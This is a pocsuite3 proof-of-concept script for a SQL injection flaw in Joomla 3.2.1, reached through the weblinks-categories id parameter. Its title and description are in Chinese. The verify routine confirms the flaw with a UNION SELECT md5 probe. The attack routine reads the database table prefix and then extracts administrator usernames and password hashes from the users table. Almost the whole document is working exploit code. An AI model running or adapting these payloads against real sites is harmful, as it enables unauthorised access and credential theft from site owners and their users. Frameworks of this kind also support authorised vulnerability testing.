Joomla 3.2.1 /helper.php SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import re class DemoPOC(POCBase): vulID = '1209' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-02-06' createDate = '2014-03-27' updateDate = '2014-03-27' references = ['http://www.exploit-db.com/exploits/31459/'] name = 'Joomla 3.2.1 /helper.php SQL注入漏洞 POC' appPowerLink = 'http://www.joomla.org/' appName = 'Joomla' appVersion = '3.2.1#' vulType = 'SQL Injection' desc = ''' Joomla中存在SQL注入漏洞，该漏洞源于程序使用SQL查询语句之前没有充分过滤用户提交的输入 ''' samples = [] install_requires = [''] def _verify(self): result = {} weblinks_url = self.url + '/index.php/weblinks-categories?id=0' inj_url = weblinks_url + "%20%29%20union%20select%20md5%28'test'%29%20--%20%29" page_content = requests.get(inj_url).text match_md5 = re.search('098f6bcd4621d373cade4e832627b4f6', page_content) match_prefix = re.search('`(.*?)_contentitem_tag_map`', page_content) if match_md5: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = inj_url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): result = {} weblinks_url = self.url + '/index.php/weblinks-categories?id=0' inj_url = weblinks_url + "%20%29%20union%20select%20md5%28'test'%29%20--%20%29" page_content = requests.get(inj_url).text match_md5 = re.search('098f6bcd4621d373cade4e832627b4f6', page_content) match_prefix = re.search('`(.*?)_contentitem_tag_map`', page_content) if not match_prefix: return self.parse_output(result) weblinks_url = self.url + '/index.php/weblinks-categories?id=0' inj_url = weblinks_url + "%20%29%20union%20select%20concat%28'username'%2Cusername%2C'password'%2Cpassword%29%20from%20%60" + match_prefix.group( 1) + "_users%60%20--%20%29" page_content = requests.get(inj_url).text password_match = re.search('username(.*?)password(.*?)\) AND', page_content) if password_match: result['AdminInfo'] = {} result['AdminInfo']['username'] = password_match.group(1) result['AdminInfo']['password'] = password_match.group(2) return self.parse_output(result) register_poc(DemoPOC)